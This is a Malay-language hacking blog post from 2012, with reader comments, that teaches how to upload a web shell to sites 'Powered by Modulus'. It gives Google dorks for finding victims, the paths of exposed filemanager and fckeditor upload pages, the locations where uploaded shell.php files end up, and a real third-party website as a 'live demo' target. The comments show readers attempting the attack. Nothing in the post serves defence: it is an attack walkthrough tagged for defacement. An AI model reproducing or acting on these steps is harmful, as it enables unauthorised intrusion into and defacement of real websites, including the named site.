Powered by Modulus - Shell Upload Vulnerability

Tuesday, 7 August 2012

Powered by Modulus - Shell Upload Vulnerability

By: Afif 06:44 Deface, Exploits 7 comments

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit yang boleh upload shell.Ok jom mula...

1. Mula2 google dork :

“Powered by Modulus”
inurl:filemanager/libraries/

2. Seterusnya pilih salah satu web.

Exploit :
http://localhost/modules/filemanager/libraries/filemanager/filemanager.php
or
http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html

3. Paparan dia lebih kurang macam ni :

Next click butang UPLOAD.Rujuk gambar :

Kemudian akan keluar macam ni :

Click Choose File dan UPLOAD!

Allowed File : php, html, asp, php4, txt, jpg, and more

4. Untuk tengok hasil :

http://localhost/modules/core/home/2/shell.php
or
http://localhost/home/2/shell.php

5.DONE!

Live demo :

http://lakesidedairy.com/modules/filemanager/libraries/filemanager/filemanager.php

Ok semoga berjaya.Assalamualaikum.

KidPhantom7 August 2012 at 06:55
nice share bro
ReplyDelete
Replies
Unknown7 August 2012 at 07:04
Error while saving *****.php :/
ReplyDelete
Replies
Anonymous7 August 2012 at 10:54
This site is running TeamViewer.

Free Port 80 for other applications in advanced settings.

kenapa jadi macam nie.. kurang paham la..mintak tunjuk ajar lagi.=)
ReplyDelete
Replies
malaysianhacker8 August 2012 at 00:01
ni mcm jeniz fckeditor je ni :3
ReplyDelete
Replies
Afif8 August 2012 at 09:41
adik beradik dia.haha
ReplyDelete
Replies
Muhammad Fikri Fakhrezy21 August 2012 at 01:54
Ini artikel saya yang buat, tak de ikak cantumkan nama awak di sini -_-
ReplyDelete
Replies
Afif4 September 2012 at 05:13
Ini saya ambil dari binus hacker.tetapi saya tulis lain.
ReplyDelete
Replies

Add comment

Tuesday, 7 August 2012

Powered by Modulus - Shell Upload Vulnerability

7 comments:

Popular Posts

Followers